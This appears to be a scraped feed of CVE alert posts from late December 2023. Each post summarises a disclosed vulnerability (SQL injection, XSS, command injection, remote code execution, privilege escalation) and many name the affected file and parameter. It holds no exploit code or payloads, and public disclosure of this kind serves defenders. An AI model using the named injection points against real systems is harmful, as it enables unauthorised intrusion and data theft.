🚨 CVE-2023-7188A vulnerability classified as critical has been found in Shipping 100 Fahuo100 up to 1.1. Affected is an unknown function of the file member/login.php. The manipulation of the argument M_pwd leads to sql injection. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-249390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-31 14:24:39 |
🚨 CVE-2023-6185Improper Input Validation vulnerability in GStreamer integration of The Document Foundation LibreOffice allows an attacker to execute arbitrary GStreamer plugins.In affected versions the filename of the embedded video is not sufficiently escaped when passed to GStreamer enabling an attacker to run arbitrary gstreamer plugins depending on what plugins are installed on the target system.🎖@cveNotify |
|
| 2023-12-31 14:24:34 |
🚨 CVE-2020-12803ODF documents can contain forms to be filled out by the user. Similar to HTML forms, the contained form data can be submitted to a URI, for example, to an external web server. To create submittable forms, ODF implements the XForms W3C standard, which allows data to be submitted without the need for macros or other active scripting Prior to version 6.4.4 LibreOffice allowed forms to be submitted to any URI, including file: URIs, enabling form submissions to overwrite local files. User-interaction is required to submit the form, but to avoid the possibility of malicious documents engineered to maximize the possibility of inadvertent user submission this feature has now been limited to http[s] URIs, removing the possibility to overwrite local files. This issue affects: The Document Foundation LibreOffice versions prior to 6.4.4.🎖@cveNotify |
|
| 2023-12-31 14:24:33 |
🚨 CVE-2018-1311The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.🎖@cveNotify |
|
| 2023-12-31 13:24:32 |
🚨 CVE-2023-7186A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been declared as critical. This vulnerability affects unknown code of the file member/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-31 12:24:32 |
🚨 CVE-2023-7185A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been classified as critical. This affects an unknown part of the file shop/wxpay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249387. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-31 11:24:33 |
🚨 CVE-2023-7183A vulnerability has been found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this vulnerability is an unknown functionality of the file shop/alipay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249385 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-31 11:24:32 |
🚨 CVE-2023-49777Deserialization of Untrusted Data vulnerability in YITH YITH WooCommerce Product Add-Ons.This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.3.0.🎖@cveNotify |
|
| 2023-12-31 10:24:33 |
🚨 CVE-2023-6093A vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. The vulnerability result from incorrectly restricts frame objects, which lead to user confusion about which interface the user is interacting with.This vulnerability may lead attacker to trick user into interacting with the application.🎖@cveNotify |
|
| 2023-12-31 10:24:32 |
🚨 CVE-2023-39157Improper Control of Generation of Code ('Code Injection') vulnerability in Crocoblock JetElements For Elementor.This issue affects JetElements For Elementor: from n/a through 2.6.10.🎖@cveNotify |
|
| 2023-12-31 09:24:42 |
🚨 CVE-2023-7130A vulnerability has been found in code-projects College Notes Gallery 2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument user leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249133 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-31 07:24:37 |
🚨 CVE-2023-52286Tencent tdsqlpcloud through 1.8.5 allows unauthenticated remote attackers to discover database credentials via an index.php/api/install/get_db_info request, a related issue to CVE-2023-42387.🎖@cveNotify |
|
| 2023-12-31 07:24:36 |
🚨 CVE-2021-46901examples/6lbr/apps/6lbr-webserver/httpd.c in CETIC-6LBR (aka 6lbr) 1.5.0 has a strcat stack-based buffer overflow via a request for a long URL over a 6LoWPAN network.🎖@cveNotify |
|
| 2023-12-31 06:24:37 |
🚨 CVE-2023-52284Bytecode Alliance wasm-micro-runtime (aka WebAssembly Micro Runtime or WAMR) before 1.3.0 can have an "double free or corruption" error for a valid WebAssembly module because push_pop_frame_ref_offset is mishandled.🎖@cveNotify |
|
| 2023-12-31 05:24:32 |
🚨 CVE-2021-46900Sympa before 6.2.62 relies on a cookie parameter for certain security objectives, but does not ensure that this parameter exists and has an unpredictable value. Specifically, the cookie parameter is both a salt for stored passwords and an XSS protection mechanism.🎖@cveNotify |
|
| 2023-12-31 01:24:32 |
🚨 CVE-2023-52269MDaemon SecurityGateway through 9.0.3 allows XSS via a crafted Message Content Filtering rule. This might allow domain administrators to conduct attacks against global administrators.🎖@cveNotify |
|
| 2023-12-31 00:24:40 |
🚨 CVE-2023-52267ehttp 1.0.6 before 17405b9 has a simple_log.cpp _log out-of-bounds-read during error logging for long strings.🎖@cveNotify |
|
| 2023-12-31 00:24:33 |
🚨 CVE-2023-48893SLiMS (aka SENAYAN Library Management System) through 9.6.1 allows admin/modules/reporting/customs/staff_act.php SQL Injection via startDate or untilDate.🎖@cveNotify |
|
| 2023-12-31 00:24:32 |
🚨 CVE-2023-40303GNU inetutils through 2.4 may allow privilege escalation because of unchecked return values of set*id() family functions in ftpd, rcp, rlogin, rsh, rshd, and uucpd. This is, for example, relevant if the setuid system call fails when a process is trying to drop privileges before letting an ordinary user control the activities of the process.🎖@cveNotify |
|
| 2023-12-30 23:24:32 |
🚨 CVE-2023-52264The beesblog (aka Bees Blog) component before 1.6.2 for thirty bees allows Reflected XSS because controllers/front/post.php sharing_url is mishandled.🎖@cveNotify |
|
| 2023-12-30 21:24:37 |
🚨 CVE-2023-50471cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_InsertItemInArray at cJSON.c.🎖@cveNotify |
|
| 2023-12-30 21:24:33 |
🚨 CVE-2023-49467Libde265 v1.0.14 was discovered to contain a heap-buffer-overflow vulnerability in the derive_combined_bipredictive_merging_candidates function at motion.cc.🎖@cveNotify |
|
| 2023-12-30 21:24:32 |
🚨 CVE-2023-31698Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).🎖@cveNotify |
|
| 2023-12-30 19:24:33 |
🚨 CVE-2023-6998Improper privilege management vulnerability in CoolKit Technology eWeLink on Android and iOS allows application lockscreen bypass.This issue affects eWeLink before 5.2.0.🎖@cveNotify |
|
| 2023-12-30 19:24:32 |
🚨 CVE-2023-52262outdoorbits little-backup-box (aka Little Backup Box) before f39f91c allows remote attackers to execute arbitrary code because the PHP extract function is used for untrusted input.🎖@cveNotify |
|
| 2023-12-30 17:24:37 |
🚨 CVE-2023-7179A vulnerability, which was classified as critical, was found in Campcodes Online College Library System 1.0. Affected is an unknown function of the file /admin/category_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249366 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-30 17:24:33 |
🚨 CVE-2023-50589Grupo Embras GEOSIAP ERP v2.2.167.02 was discovered to contain a SQL injection vulnerability via the codLogin parameter on the login page.🎖@cveNotify |
|
| 2023-12-30 17:24:32 |
🚨 CVE-2023-49299Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.This issue affects Apache DolphinScheduler: until 3.1.9.Users are recommended to upgrade to version 3.1.9, which fixes the issue.🎖@cveNotify |
|
| 2023-12-30 08:24:34 |
🚨 CVE-2023-52257LogoBee 0.2 allows updates.php?id= XSS.🎖@cveNotify |
|
| 2023-12-30 06:24:32 |
🚨 CVE-2023-52252Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint.🎖@cveNotify |
|
| 2023-12-30 00:24:50 |
🚨 CVE-2020-17141Microsoft Exchange Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:49 |
🚨 CVE-2020-17136Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:44 |
🚨 CVE-2020-17132Microsoft Exchange Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:43 |
🚨 CVE-2020-17118Microsoft SharePoint Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:39 |
🚨 CVE-2020-17117Microsoft Exchange Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:38 |
🚨 CVE-2020-17097Windows Digital Media Receiver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:33 |
🚨 CVE-2020-17094Windows Error Reporting Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-30 00:24:32 |
🚨 CVE-2020-17089Microsoft SharePoint Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 23:24:40 |
🚨 CVE-2021-1648Microsoft splwow64 Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 23:24:34 |
🚨 CVE-2021-1646Windows WLAN Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 23:24:33 |
🚨 CVE-2021-1637Windows DNS Query Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-29 22:54:33 |
🚨 CVE-2023-4320An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.🎖@cveNotify |
|
| 2023-12-29 22:54:32 |
🚨 CVE-2023-3628A flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.🎖@cveNotify |
|
| 2023-12-29 22:24:32 |
🚨 CVE-2023-50070Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject.🎖@cveNotify |
|
| 2023-12-29 21:24:33 |
🚨 CVE-2023-50069WireMock with GUI versions 3.2.0.0 through 3.0.4.0 are vulnerable to stored cross-site scripting (SXSS) through the recording feature. An attacker can host a malicious payload and perform a test mapping pointing to the attacker's file, and the result will render on the Matched page in the Body area, resulting in the execution of the payload. This occurs because the response body is not validated or sanitized.🎖@cveNotify |
|
| 2023-12-29 21:24:32 |
🚨 CVE-2023-50035PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection on the Users login panel because of "password" parameter is directly used in the SQL query without any sanitization and the SQL Injection payload being executed.🎖@cveNotify |
|
| 2023-12-29 20:24:46 |
🚨 CVE-2021-26865Windows Container Execution Agent Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 20:24:40 |
🚨 CVE-2021-26864Windows Virtual Registry Provider Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 20:24:39 |
🚨 CVE-2021-26861Windows Graphics Component Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 20:24:38 |
🚨 CVE-2021-26860Windows App-V Overlay Filter Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 20:24:34 |
🚨 CVE-2021-24095DirectX Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 20:24:33 |
🚨 CVE-2021-1640Windows Print Spooler Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 19:54:45 |
🚨 CVE-2023-52139Misskey is an open source, decentralized social media platform. Third-party applications may be able to access some endpoints or Websocket APIs that are incorrectly specified as [kind](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L811) or [secure](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L805) without the user's permission and perform operations such as reading or adding non-public content. As a result, if the user who authenticated the application is an administrator, confidential information such as object storage secret keys and SMTP server passwords will be leaked, and general users can also create invitation codes without permission and leak non-public user information. This is patched in version [2023.12.1](https://github.com/misskey-dev/misskey/commit/c96bc36fedc804dc840ea791a9355d7df0748e64).🎖@cveNotify |
|
| 2023-12-29 19:54:39 |
🚨 CVE-2023-52137The [`tj-actions/verify-changed-files`](https://github.com/tj-actions/verify-changed-files) action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The [`verify-changed-files`](https://github.com/tj-actions/verify-changed-files) workflow returns the list of files changed within a workflow execution. This could potentially allow filenames that contain special characters such as `;` which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands, an attacker may be able to steal secrets such as `GITHUB_TOKEN` if triggered on other events than `pull_request`.This has been patched in versions [17](https://github.com/tj-actions/verify-changed-files/releases/tag/v17) and [17.0.0](https://github.com/tj-actions/verify-changed-files/releases/tag/v17.0.0) by enabling `safe_output` by default and returning filename paths escaping special characters for bash environments.🎖@cveNotify |
|
| 2023-12-29 19:54:38 |
🚨 CVE-2023-51033TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface.🎖@cveNotify |
|
| 2023-12-29 19:54:37 |
🚨 CVE-2023-50147There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi .cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513.🎖@cveNotify |
|
| 2023-12-29 19:54:33 |
🚨 CVE-2023-51448Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `‘managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `‘/cacti/managers.php’` with an SQLi payload in the `‘selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist.🎖@cveNotify |
|
| 2023-12-29 19:54:32 |
🚨 CVE-2023-50250Cacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php.` When uploading an xml template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains unfiltered xml template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available.🎖@cveNotify |
|
| 2023-12-29 19:24:44 |
🚨 CVE-2023-49086Cacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack.Exploitation of the vulnerability is possible for an authorized user. The vulnerable component isthe `graphs_new.php`. Impact of the vulnerability - execution of arbitrary javascript code inthe attacked user's browser. This issue has been patched in version 1.2.26.🎖@cveNotify |
|
| 2023-12-29 19:24:43 |
🚨 CVE-2023-49084Cacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability execution of arbitrary code on the server.🎖@cveNotify |
|
| 2023-12-29 19:24:39 |
🚨 CVE-2023-37520Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay.🎖@cveNotify |
|
| 2023-12-29 19:24:38 |
🚨 CVE-2023-6804Improper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.🎖@cveNotify |
|
| 2023-12-29 19:24:33 |
🚨 CVE-2023-6802An insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.🎖@cveNotify |
|
| 2023-12-29 19:24:32 |
🚨 CVE-2023-51380An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.🎖@cveNotify |
|
| 2023-12-29 18:54:40 |
🚨 CVE-2016-9428An issue was discovered in the Tatsuya Kinoshita w3m fork before 0.5.3-31. Heap-based buffer overflow in the addMultirowsForm function in w3m allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted HTML page.🎖@cveNotify |
|
| 2023-12-29 18:54:33 |
🚨 CVE-2016-9423An issue was discovered in the Tatsuya Kinoshita w3m fork before 0.5.3-31. Heap-based buffer overflow in w3m allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted HTML page.🎖@cveNotify |
|
| 2023-12-29 18:54:32 |
🚨 CVE-2016-9422An issue was discovered in the Tatsuya Kinoshita w3m fork before 0.5.3-31. The feed_table_tag function in w3m doesn't properly validate the value of table span, which allows remote attackers to cause a denial of service (stack and/or heap buffer overflow) and possibly execute arbitrary code via a crafted HTML page.🎖@cveNotify |
|
| 2023-12-29 18:24:32 |
🚨 CVE-2015-1239Double free vulnerability in the j2k_read_ppm_v3 function in OpenJPEG before r2997, as used in PDFium in Google Chrome, allows remote attackers to cause a denial of service (process crash) via a crafted PDF.🎖@cveNotify |
|
| 2023-12-29 17:54:32 |
🚨 CVE-2023-44481Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setearnleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 17:24:50 |
🚨 CVE-2021-1725Bot Framework SDK Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:49 |
🚨 CVE-2021-1718Microsoft SharePoint Server Tampering Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:45 |
🚨 CVE-2021-1717Microsoft SharePoint Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:44 |
🚨 CVE-2021-1714Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:43 |
🚨 CVE-2021-1713Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:40 |
🚨 CVE-2021-1712Microsoft SharePoint Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:39 |
🚨 CVE-2021-1707Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:38 |
🚨 CVE-2021-1677Azure Active Directory Pod Identity Spoofing Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:33 |
🚨 CVE-2021-1643HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-29 17:24:32 |
🚨 CVE-2021-1636Microsoft SQL Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-29 16:54:45 |
🚨 CVE-2023-47093An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine.🎖@cveNotify |
|
| 2023-12-29 16:54:39 |
🚨 CVE-2023-6977This vulnerability enables malicious users to read sensitive files on the server.🎖@cveNotify |
|
| 2023-12-29 16:54:38 |
🚨 CVE-2023-50706A user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens.🎖@cveNotify |
|
| 2023-12-29 16:54:37 |
🚨 CVE-2023-50705An attacker could create malicious requests to obtain sensitive information about the web server.🎖@cveNotify |
|
| 2023-12-29 16:54:34 |
🚨 CVE-2023-50704An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.🎖@cveNotify |
|
| 2023-12-29 16:54:33 |
🚨 CVE-2023-6929EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities.🎖@cveNotify |
|
| 2023-12-29 16:54:32 |
🚨 CVE-2023-6928EuroTel ETL3100 versions v01c01 and v01x37 does not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system.🎖@cveNotify |
|
| 2023-12-29 16:24:33 |
🚨 CVE-2023-50707Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device.🎖@cveNotify |
|
| 2023-12-29 16:24:32 |
🚨 CVE-2023-35001Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace🎖@cveNotify |
|
| 2023-12-29 15:54:45 |
🚨 CVE-2023-51379An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.🎖@cveNotify |
|
| 2023-12-29 15:54:44 |
🚨 CVE-2023-48720Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'password' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 15:54:40 |
🚨 CVE-2023-46648An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-12-29 15:54:39 |
🚨 CVE-2023-46646Improper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the "Get a check run" API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7 3.10.4, and 3.11.0.🎖@cveNotify |
|
| 2023-12-29 15:54:35 |
🚨 CVE-2023-4004A use-after-free flaw was found in the Linux kernel's netfilter in the way a user triggers the nft_pipapo_remove function with the element, without a NFT_SET_EXT_KEY_END. This issue could allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-12-29 15:54:34 |
🚨 CVE-2014-3183Heap-based buffer overflow in the logi_dj_ll_raw_request function in drivers/hid/hid-logitech-dj.c in the Linux kernel before 3.16.2 allows physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that specifies a large report size for an LED report.🎖@cveNotify |
|
| 2023-12-29 15:54:33 |
🚨 CVE-2014-3182Array index error in the logi_dj_raw_event function in drivers/hid/hid-logitech-dj.c in the Linux kernel before 3.16.2 allows physically proximate attackers to execute arbitrary code or cause a denial of service (invalid kfree) via a crafted device that provides a malformed REPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.🎖@cveNotify |
|
| 2023-12-29 14:54:39 |
🚨 CVE-2023-51475Unrestricted Upload of File with Dangerous Type vulnerability in IOSS WP MLM SOFTWARE PLUGIN.This issue affects WP MLM SOFTWARE PLUGIN: from n/a through 4.0.🎖@cveNotify |
|
| 2023-12-29 14:54:38 |
🚨 CVE-2023-51421Unrestricted Upload of File with Dangerous Type vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce.This issue affects Verge3D Publishing and E-Commerce: from n/a through 4.5.2.🎖@cveNotify |
|
| 2023-12-29 14:54:33 |
🚨 CVE-2023-51417Unrestricted Upload of File with Dangerous Type vulnerability in Joris van Montfort JVM Gutenberg Rich Text Icons.This issue affects JVM Gutenberg Rich Text Icons: from n/a through 1.2.3.🎖@cveNotify |
|
| 2023-12-29 14:54:32 |
🚨 CVE-2023-51410Unrestricted Upload of File with Dangerous Type vulnerability in WPVibes WP Mail Log.This issue affects WP Mail Log: from n/a through 1.1.2.🎖@cveNotify |
|
| 2023-12-29 14:24:46 |
🚨 CVE-2023-48717Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 14:24:39 |
🚨 CVE-2023-48690Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'bynum' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 14:24:38 |
🚨 CVE-2023-48687Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'from' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 14:24:34 |
🚨 CVE-2023-48685Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'psd' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-29 14:24:33 |
🚨 CVE-2023-6974A malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine.🎖@cveNotify |
|
| 2023-12-29 11:24:44 |
🚨 CVE-2023-52135Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WS Form WS Form LITE – Drag & Drop Contact Form Builder for WordPress.This issue affects WS Form LITE – Drag & Drop Contact Form Builder for WordPress: from n/a through 1.9.170.🎖@cveNotify |
|
| 2023-12-29 11:24:43 |
🚨 CVE-2023-51541Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aleksandar Urošević Stock Ticker allows Stored XSS.This issue affects Stock Ticker: from n/a through 3.23.4.🎖@cveNotify |
|
| 2023-12-29 11:24:39 |
🚨 CVE-2023-51396Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brizy.Io Brizy – Page Builder allows Stored XSS.This issue affects Brizy – Page Builder: from n/a through 2.4.29.🎖@cveNotify |
|
| 2023-12-29 11:24:38 |
🚨 CVE-2023-51373Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ian Kennerley Google Photos Gallery with Shortcodes allows Reflected XSS.This issue affects Google Photos Gallery with Shortcodes: from n/a through 4.0.2.🎖@cveNotify |
|
| 2023-12-29 11:24:33 |
🚨 CVE-2023-51371Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bit Assist Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget allows Stored XSS.This issue affects Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget: from n/a through 1.1.9.🎖@cveNotify |
|
| 2023-12-29 11:24:32 |
🚨 CVE-2023-50896Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in weForms weForms – Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS.This issue affects weForms – Easy Drag & Drop Contact Form Builder For WordPress: from n/a through 1.6.17.🎖@cveNotify |
|
| 2023-12-29 10:24:40 |
🚨 CVE-2023-32101URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Pexle Chris Library Viewer.This issue affects Library Viewer: from n/a through 2.0.6.🎖@cveNotify |
|
| 2023-12-29 10:24:33 |
🚨 CVE-2023-31095URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms.This issue affects Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.2.8.🎖@cveNotify |
|
| 2023-12-29 10:24:32 |
🚨 CVE-2022-44589Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange's Google Authenticator – WordPress Two Factor Authentication – 2FA , Two Factor, OTP SMS and Email | Passwordless login.This issue affects miniOrange's Google Authenticator – WordPress Two Factor Authentication – 2FA , Two Factor, OTP SMS and Email | Passwordless login: from n/a through 5.6.1.🎖@cveNotify |
|
| 2023-12-29 09:24:40 |
🚨 CVE-2023-40606Improper Control of Generation of Code ('Code Injection') vulnerability in Kanban for WordPress Kanban Boards for WordPress.This issue affects Kanban Boards for WordPress: from n/a through 2.5.21.🎖@cveNotify |
|
| 2023-12-29 09:24:33 |
🚨 CVE-2023-22676Missing Authorization vulnerability in Anders Thorborg.This issue affects Anders Thorborg: from n/a through 1.4.12.🎖@cveNotify |
|
| 2023-12-29 09:24:32 |
